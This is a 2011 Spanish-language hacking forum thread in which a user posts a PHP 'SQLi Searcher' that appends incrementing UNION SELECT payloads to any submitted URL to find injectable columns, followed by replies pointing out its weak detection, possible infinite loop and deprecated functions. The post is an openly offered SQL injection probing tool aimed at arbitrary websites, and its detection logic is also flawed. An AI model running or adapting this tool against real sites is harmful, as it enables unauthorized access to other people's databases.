This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

[Código-PHP] SQLi Searcher V1 - JaAViEr

  • 4 Replies
  • 3085 Views

0 Members and 1 Guest are viewing this topic.

Offline JaAViEr

  • *
  • Underc0der
  • Posts: 162
  • Actividad:
    0%
  • Reputación 0
  • http://codigo.ga
    • View Profile
    • Blog de Programación :: Python

[Código-PHP] SQLi Searcher V1 - JaAViEr

  • on: June 04, 2011, 11:46:12 pm
Luego de hacerlo en Python -> You are not allowed to view links. Register or Login
Traigo la versión PHP para quienes no tenga Python :P
Code: (php) You are not allowed to view links. Register or Login
<form action=? method=post>
URL:<input name=url><br/>
<input type=SUBMIT><br />
<?php
$url
=$_REQUEST['url'];
if(
$url==NULL){exit;}
$temp="-1+union+all+select+";$i=1;
for(;;){
$temp.="$i,";
$injection=substr($temp,0,-1);
$c=file_get_contents("$url$injection");
if(!
eregi("The used SELECT",$c) || !eregi("mysql_fetch",$c)){
echo 
"Injection encontrada  <a href=$url$injection>VER !</a><br /><br />";
exit;
}
$i++;
}
?>

Saludos UnderC0de ;)
« Last Edit: March 22, 2014, 02:18:29 pm by Expermicid »
You are not allowed to view links. Register or Login

Offline ~ Yoya ~

  • *
  • Underc0der
  • Posts: 153
  • Actividad:
    0%
  • Reputación 0
    • View Profile
    • Email

Re:[Código-PHP]SQLi Searcher V1 - JaAViEr

  • on: June 05, 2011, 11:15:20 am
Buenas @JaAVIEr, no es por nada pero tienes que agregarle mas ganas.

Solo tiene dos formas para detectar que es una vulnerable a SQLI y eso que muchas veces no dan errores.
Si no detecta SQLI, se ejecuta un bucle infinito que al final te estas auto-dosseando.

Tambien estas utilizando funciones obsoletas como You are not allowed to view links. Register or Login y el código se puede optimizar mucho mas.

Tienes que tratar de optimizar los códigos, principalmente lo que están dentro de un bucle...
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Offline JaAViEr

  • *
  • Underc0der
  • Posts: 162
  • Actividad:
    0%
  • Reputación 0
  • http://codigo.ga
    • View Profile
    • Blog de Programación :: Python

Re:[Código-PHP]SQLi Searcher V1 - JaAViEr

  • on: June 05, 2011, 05:29:40 pm
You are not allowed to view links. Register or Login
Buenas @JaAVIEr, no es por nada pero tienes que agregarle mas ganas.

Solo tiene dos formas para detectar que es una vulnerable a SQLI y eso que muchas veces no dan errores.
Si no detecta SQLI, se ejecuta un bucle infinito que al final te estas auto-dosseando.

Tambien estas utilizando funciones obsoletas como You are not allowed to view links. Register or Login y el código se puede optimizar mucho mas.

Tienes que tratar de optimizar los códigos, principalmente lo que están dentro de un bucle...
Thanks you.
Sobre el eregi() lo usé porque otros como stristr y esas madres no me ayudaban mucho :-\
Ya sabía que lidiaba con algo "obsoleto"
You are not allowed to view links. Register or Login

Offline ~ Yoya ~

  • *
  • Underc0der
  • Posts: 153
  • Actividad:
    0%
  • Reputación 0
    • View Profile
    • Email

Re:[Código-PHP]SQLi Searcher V1 - JaAViEr

  • on: June 05, 2011, 05:59:05 pm
No pasa nada, puedes sustituir eregi() por strpos o usar preg_match.

Saludos y espero ver el source mejorado.

Pd: Recuerda que una herramienta no es buena por la cantidad de lenguaje que esta programada.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Offline JaAViEr

  • *
  • Underc0der
  • Posts: 162
  • Actividad:
    0%
  • Reputación 0
  • http://codigo.ga
    • View Profile
    • Blog de Programación :: Python

Re:[Código-PHP]SQLi Searcher V1 - JaAViEr

  • on: June 05, 2011, 06:30:48 pm
You are not allowed to view links. Register or Login
No pasa nada, puedes sustituir eregi() por strpos o usar preg_match.

Saludos y espero ver el source mejorado.

Pd: Recuerda que una herramienta no es buena por la cantidad de lenguaje que esta programada.
Claro, si te refieres a que está en Python.
No lo hago para que sea mejor, lo hago para que haya diversidad de posibilidades.
PHP es más accesible que Python , pues lo puedes ejecutar desde una web.
You are not allowed to view links. Register or Login